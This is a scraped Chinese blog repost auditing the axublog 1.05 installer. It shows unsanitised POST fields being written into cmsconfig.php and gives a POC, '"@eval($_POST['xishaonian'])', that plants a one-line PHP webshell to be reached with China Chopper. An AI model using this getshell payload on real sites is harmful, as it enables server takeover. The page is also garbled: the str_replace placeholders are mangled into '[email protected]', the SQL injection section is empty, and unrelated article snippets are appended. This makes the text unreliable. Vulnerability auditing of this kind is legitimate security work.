2. 程式人生 > >axublog 1.05代碼審計

axublog 1.05代碼審計

阿新 發佈:2017-08-30
fun function onf div pty link strong 寫入 代碼

00x1 安裝漏洞

  install/cmsconfig.php

 1 function step4(){
 2 $root=$_POST["root"];
 3 $dbuser=$_POST["dbuser"];
 4 $dbpsw=$_POST["dbpsw"];
 5 $dbname=$_POST["dbname"];
 6 $tabhead=$_POST["tabhead"];
 7 
 8 $ad_user=$_POST["ad_user"];
 9 $ad_psw=$_POST["ad_psw"];
10 
11 $webname=$_POST["webname"];

 
12 $weburl=$_POST["weburl"];
13 $webinfo=$_POST["webinfo"];
14 $webkeywords=$_POST["webkeywords"];
15 $webauthor=$_POST["webauthor"];

這幾個都是可控的,並沒有進行任何處理。然後傳到了$text2,然後又寫到了cmsconfig.php當中。

 1 $file="config_empty.php";
 2 $fp=fopen($file,"r"); //以寫入方式打開文件
 3 $text2=fread($fp,4096); //讀取文件內容
 4 $text2
 
=str_replace(‘@[email protected]‘,$root,$text2);
 5 $text2=str_replace(‘@[email protected]‘,$dbuser,$text2);
 6 $text2=str_replace(‘@[email protected]‘,$dbpsw,$text2);
 7 $text2=str_replace(‘@[email protected]‘,$dbname,$text2);
 8 $text2=str_replace(‘@[email protected]‘,$tabhead
 
,$text2);
 9 $text2=str_replace(‘@[email protected]‘,$webname,$text2);
10 $text2=str_replace(‘@[email protected]‘,$weburl,$text2);
11 $text2=str_replace(‘@[email protected]‘,$webinfo,$text2);
12 $text2=str_replace(‘@[email protected]‘,$webkeywords,$text2);
13 $text2=str_replace(‘@[email protected]‘,$webauthor,$text2);
14 $file="../cmsconfig.php"; //定義文件
15 $fp=fopen($file,"w"); //以寫入方式打開文件
16 fwrite($fp,$text2); 
17 @unlink("goinstall.php");

這個漏洞比較簡單,直接在配置信息中填寫一句話閉合就可以getshell了。

POC:"@eval($_POST[‘xishaonian‘])

然後菜刀直接連接就cmsconfig.php即可。

00x2 SQL註入

axublog 1.05代碼審計

相關推薦

axublog 1.05審計

fun function onf div pty link strong 寫入 代碼 00x1 安裝漏洞   install/cmsconfig.php 1 function step4(){ 2 $root=$_POST["root"]; 3 $dbus

XerCMS-1.0.3審計(文件名報錯註入後臺getshell)

each orb his jpg pla module 將不 last self 鏈接:https://share.weiyun.com/6b98e41d036967178e1a21fb88ed340f (密碼:YnNY) 文件名報錯註入 index.php?m=memb

ZZCMS8.1|審計

close 選擇 name ima 一個 們的 搭建 數據 () 這周的審計任務 ZZCMS8.1是站長招商網內容管理系統。審計這個CMS的原因很多,這裏就不詳說了(其實是漏洞類型多點)

審計】XDCMS 報錯註入

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

審計】VAuditDemo 重裝漏洞

demo http ima 重裝 config 退出 網站安全 執行 知識 一、源碼安裝漏洞介紹   一般在PHP源碼程序都有一個初始安裝的功能,如果相關代碼沒有對參數進行嚴格過濾,可能會導致攻擊者訪問安裝頁面(install.php)或構造數據包,對網站進行重新安裝,從而

審計】VAuditDemo 文件包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

審計】VAuditDemo 後臺登錄功能驗證繞過

-1 php 審計 use 存在 功能 post nbsp logs 在 admin/logCheck.php中 $_POST[‘user‘]和$_POST[‘pass‘] 未經過任何過濾或者編碼處理就傳入到$query中,可能存在萬能密碼繞過機制 但是$pass經過了加

angularjs-1.3學習 模塊

一個 簡單回顧 loaded 無法 ring eof elf only 開始 花了點時間,閱讀了下angularjs的源碼。本次先從模塊化開始。 angular可以通過module的api來實現前端代碼的模塊化管理。跟define類似。但不具備異步加載腳本的功能。先從最基本

[php審計] Window api函數 FindFirstFile 在php中的問題

img -1 http api 問題 文件 span file 多個 include文件夾中文件: 內容: <?php echo __FILE__; ?> index.php: 演示如下: “<<”替換多個任意字符:

Java審計連載之—SQL註入

問題 連載 edi 初學者 epo lte where color 用戶 前言近日閑來無事,快兩年都沒怎麽寫代碼了,打算寫幾行代碼,做代碼審計一年了,每天看代碼都好幾萬行,突然發現自己都不會寫代碼了,真是很DT。想當初入門代碼審計的時候真是非常難,網上幾乎找不到什麽java

Java審計連載之—添油加醋

安全 人的 逆向思維 9.png pan 啟動 com 項目 lte 在代碼審計中,按業務流程審計當然是必須的,人工的流程審計的優點是能夠更加全面的發現漏洞,但是缺點是查找漏洞效率低下。如果要定向的查找漏洞,逆向跟蹤變量技術就顯得更加突出,如查找XSS、SQL註入、命令執行

[審計]Bycms v1.0存儲型XSS一枚#

mode input enc 正文 蘋果 功能模塊 fit esp nec 0x00 前言: 首頁本地搭建環境,我所使用的是Windows PHPstudy集成環境。使用起來非常方便。特別是審計的時候。可以任意切換PHP版本。 0x01 CMS簡介:

PHP審計筆記--SQL註入

pre 成了 images strip ech ont mic lose 行數據     0X01 普通註入 SQL參數拼接,未做任何過濾 <?php $con = mysql_connect("localhost","root","root"); if (!$co

1----JS的存放

屬性。 屬性 div tro 擴展 文檔 腳本 默認 java 有兩種方式存放JS代碼 1.在 html頁面直接寫JS代碼,這個代碼寫在標簽<script></script>中,這個標簽可以出現在任何位置head/body前後都可以。 2.一

審計就該這麽來3 beescms getshell

lower login time() 讀下 超時 客戶 date intval 上傳文件 本文作者:i春秋作家——索馬裏的海賊 前言上一回(http://bbs.ichunqiu.com/thread-13714-1-1.html)說到快速漏洞挖掘中的幾個重點關註對象,

java+Selenium+TestNg搭建自動化測試架構(1)實現和數據的分離

bsp bubuko puts 過去 frame 添加 img 通過 ava 1.主要介紹介紹Java+Selenium+POM的自動化測試框架的搭建,第一個首先實現代碼和賬號URL等信息的分離。第二點支持跨瀏覽器,通過讀取配置文件的方式實現。 1)將賬號URL等

PHP審計基礎

之前 命令執行 file 一個 ssi nal arr adf nts 一、GPC 整數類型不受GPC影響 $_SERVER變量不受GPC保護 $_FILES變量不受GPC保護 寬字節註入 數據庫操作容易忘記添加單引號的地方如:in()/limit/order by/gr

PHP trick(審計關註點)

缺陷 add pad ase 返回 arr 空格 printf函數 導入 隨著代碼安全的普及,越來越多的開發人員知道了如何防禦sqli、xss等與語言無關的漏洞,但是對於和開發語言本身相關的一些漏洞和缺陷卻知之甚少,於是這些點也就是我們在Code audit的時候的重點關註

審計】兩個任意文件讀取漏洞實例

狀態 內容 cfg 必須 名稱 ror div 完整 FN 0x00 前言 0x01 漏洞實例一 環境搭建: XYHCMS官網:http://www.xyhcms.com/ 網站源碼版本:XYHCMS V3.5(2017-12-04 更新) 程序源碼下載:https:

審計】Spring Integration Zip不安全解壓(CVE-2018-1261)漏洞分析

圖片 ssa clas port als put gets 9.png after 1.漏洞相關信息 漏洞名稱:Spring Integration Zip不安全解壓 漏洞編號:CVE-2018-1261 漏洞描述:在spring-integration-zip.v1.0.